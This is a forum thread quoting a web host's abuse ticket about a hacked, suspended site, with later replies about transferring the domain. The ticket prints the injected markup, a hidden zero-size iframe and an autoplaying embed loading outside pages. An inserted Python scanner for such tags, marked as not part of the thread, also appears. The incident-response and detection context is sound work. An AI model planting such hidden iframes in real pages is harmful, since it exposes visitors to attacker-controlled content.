Why is unlocking a domain so difficult??


Posted on 2010-1-24 09:33:06

1 Submission by GabrielIchim
created Jan 21, 2010 at 03:48 AM

Hello,

We have received the following complaint regarding your account:

Dear abuse team,

please help to close these offending viruses sites(1) so far.

status: As of 2010-01-19 21:32:26 CET
http://support.clean-mx.de/clean-mx/viruses.php?email=hostmaster@lunarpages.com&response=alive

(for full uri, please scroll to the right end ...

We detected many active cases dated back to 2007, so please look at the date column below.
You may also subscribe to our MalwareWatch list http://lists.clean-mx.com/cgi-bin/mailman/listinfo/viruswatch

This information has been generated out of our comprehensive real time database, tracking worldwide viruses URI's

most likely also affected pages for these ip may be found via passive dns
please have a look on these other domains correlated to these ip
example: see http://www.bfk.de/bfk_dnslogger.html?query=216.227.214.83

If you review this list of offending sites, please do this carefully, pay attention for redirects also!
Also, please consider this particular machines may have a root kit installed !
So simply deleting some files or dirs or disabling cgi may not really solve the issue !

Advice: The appearance of a Virus Site on a server means that
someone intruded into the system. The server's owner should
disconnect and not return the system into service until an
audit is performed to ensure no data was lost, that all OS and
internet software is up to date with the latest security fixes,
and that any backdoors and other exploits left by the intruders
are closed. Logs should be preserved and analyzed and, perhaps,
the appropriate law enforcement agencies notified.

DO NOT JUST DELETE THE FILES. IF YOU DO NOT FIX THE SECURITY
PROBLEM, THEY WILL BE BACK!

You may forward my information to law enforcement, CERTs,
other responsible admins, or similar agencies.

+-------------------------+--------+-----------+----------------+-----------+-------------------+
| date                    | id     | virusname | ip             | domain    | Url               |
+-------------------------+--------+-----------+----------------+-----------+-------------------+
| 2010-01-19 16:20:43 CET | 362456 | Mal_Hifrm | 216.227.214.83 | doouo.com | http://doouo.com/ |
+-------------------------+--------+-----------+----------------+-----------+-------------------+

Your email address has been pulled out of whois concerning this offending network block(s).
If you are not concerned with anti-fraud measurements, please forward this mail to the next responsible desk available...

If you just close(d) these incident(s) please give us a feedback, our automatic walker process may not detect a closed case

explanation of virusnames:
==========================
unknown_html_RFI_php    not yet detected by scanners as RFI, but pure php code for injection
unknown_html_RFI_perl   not yet detected by scanners as RFI, but pure perl code for injection
unknown_html_RFI_eval   not yet detected by scanners as RFI, but suspect javascript obfuscating evals
unknown_html_RFI        not yet detected by scanners as RFI, but trapped by our honeypots as remote-code-injection
unknown_html            not yet detected by scanners as RFI, but suspicious, may be in rare case false positive
unknown_exe             not yet detected by scanners as malware, but high risk!
all other names         malwarename detected by scanners
==========================

We have found the following malicious code inserted into your files:

<EMBED src=http://www.muslumangenc.com/media/ezan/2.htm =true AUTOSTART="TRUE" LOOP="TRUE">
<NOEMBED><BGSOUND src="http://www.muslumangenc.com/media/ezan/2.htm" loop=infinite></NOEMBED></EMBED>

<iframe src="http://mangasit.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

The list with the infected files is huge and we recommend recreating your account from scratch. We have been forced to suspend your account and we are waiting for your answer.

What we would suggest is the following:

1. Scan your local computer for viruses and malware. Remove any suspicious files found. You may also scan the files on your account using an anti-virus scanner as most infected files are usually recognized by anti-virus scanners. I would suggest Trend Micro which is a pretty good free anti-virus and can be downloaded from http://housecall.trendmicro.com/

2. Change your main account's password along with any other passwords that are involved (mail accounts, FTP accounts). The main account password can be reset via the CAP (Customer Account Page) at http://account.lunarpages.com. It is recommended that you create passwords using alphanumeric characters (ex: Aa1Bb2Cc3). Also, you would want to make sure that you do not use a password that is related to your domain name or site content. This will decrease the likelihood of your password being compromised.

3. Update all your applications to the latest stable version. Old application versions have security issues, which can also allow malicious injections into sites. The only way to keep your site secure under such circumstances would be to ensure you always are running the latest, secured versions of the application.

4. Re-upload the content on the server. Please also make sure to not store the new password locally (thus avoiding the "Remember my password" option).

Please proceed with the above mentioned steps and let us know if the issue will be reoccurring.

Thank you!

If you have any more questions, please don't hesitate to ask us, we will be more than happy to answer them. Please feel free to contact us for further help.

---
Gabriel Ichim
Junior System Administrator 1
Phone: 1-714-521-8150 (U.S. & International)

2 Response by Dongdong Liang
created Jan 22, 2010 at 01:39 AM

Please unlock my domain name
my domain: www.doouo.com


3 Response by Dongdong Liang
created Jan 22, 2010 at 01:17 PM

Hello,

cp, and ftp fail, I can not control

4 Response by GabrielIchim
created Jan 23, 2010 at 03:06 AM

Hello,

Please note that your account is suspended and you can connect only through cPanel to check your files. Please proceed with the steps mentioned above and let us know once done so we can scan again and unsuspend your account.

Thank you!

If you have any more questions, please don't hesitate to ask us, we will be more than happy to answer them. Please feel free to contact us for further help.

---
Gabriel Ichim
Junior System Administrator 1
Phone: 1-714-521-8150 (U.S. & International)

5 Response by Dongdong Liang
created Jan 23, 2010 at 09:29 AM

Hello

Please unlock my domain name
my domain: www.doouo.com


6 Response by Dongdong Liang
created Jan 23, 2010 at 07:38 PM

Hello
My domain will expire, and I want to move out, please help me unlock
Thank you very much
My Domain:doouo.com


7 Response by Saa Maphinda-Lebbie
created Jan 23, 2010 at 08:05 PM

Hello,

We tried to contact you via phone, and no one answered and there was no voicemail.
Please respond to the ticket with the appropriate actions or contact us if you have any questions or concerns.

Best Regards,
Saa Maphinda-Lebbie
Junior System Admin I - Systems Administrator Team
Lunarpages Webhosting

8 Response by Saa Maphinda-Lebbie
created Jan 23, 2010 at 08:14 PM

Tried to contact customer via phone; phone number may be wrong, will need an updated one.
Asked customer to reply to the ticket.
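
The complaint quoted in the ticket above reports a zero-size iframe and an EMBED tag injected into a large number of files. As an added example (not part of the thread and not Lunarpages' or clean-mx's tooling), this Python scanner lists iframe/embed/bgsound tags that load from a foreign host across a local copy of a site; the function names, the SAMPLE page and the .example host names are constructed for illustration.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

WATCHED_TAGS = {"iframe", "embed", "bgsound"}
PAGE_EXTENSIONS = (".html", ".htm", ".php", ".tpl")
TINY = {"0", "1", "0px", "1px"}  # sizes that keep an injected frame out of sight
# Constructed sample; the hosts are placeholders, not indicators from the ticket.
SAMPLE = """<iframe src="/banner.html" width="300" height="60"></iframe>
<iframe src="http://injected.example/lib/index.php" width=0 height=0 frameborder=0></iframe>
<embed src="http://media.injected.example/2.htm" autostart="TRUE" loop="TRUE">"""

class ForeignEmbedFinder(HTMLParser):
    """Record (line, tag, host, hidden) for watched tags loaded from another host."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts, self.findings = {h.lower() for h in own_hosts}, []

    def handle_starttag(self, tag, attrs):
        if tag not in WATCHED_TAGS:
            return
        a = {k: (v or "").strip().lower() for k, v in attrs}
        try:
            host = urlparse(a.get("src", "")).hostname
        except ValueError:  # malformed URL: report it instead of crashing
            host = "(unparseable)"
        if not host or host in self.own_hosts:
            return  # relative or same-site source
        style = a.get("style", "").replace(" ", "")
        hidden = "hidden" in style or "display:none" in style or (
            a.get("width") in TINY and a.get("height") in TINY)
        self.findings.append((self.getpos()[0], tag, host, hidden))

def scan_html(text, own_hosts):
    finder = ForeignEmbedFinder(own_hosts)
    finder.feed(text)
    finder.close()
    return finder.findings

def scan_tree(root, own_hosts):
    """Map each page file under root to its findings; clean files are omitted."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(PAGE_EXTENSIONS)):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                report[path] = scan_html(fh.read(), own_hosts)
    return {path: hits for path, hits in report.items() if hits}
```

Findings with hidden set to True are the zero-size or hidden frames of the kind shown in the ticket; the remaining entries are foreign embeds to review by hand.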

Replies | 4 in total

wsaddd

Posted on 2010-1-24 23:04:09

Does anyone know how to solve this?

一路同行

Posted on 2010-1-25 09:48:16

The email above says that your website has a virus.
By default the domain is not locked; take a look here: https://manage.opensrs.net/

wsaddd

Posted on 2010-1-25 22:30:12

If it isn't locked, well, I'm transferring it to GoDaddy and have already paid, but nothing has happened since step three.

一路同行

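Posted on 2010-1-26 10:00:49

The confirmation email was probably sent to LP, and nobody clicked to confirm.
You need to go to https://manage.opensrs.net and change the email address to your own.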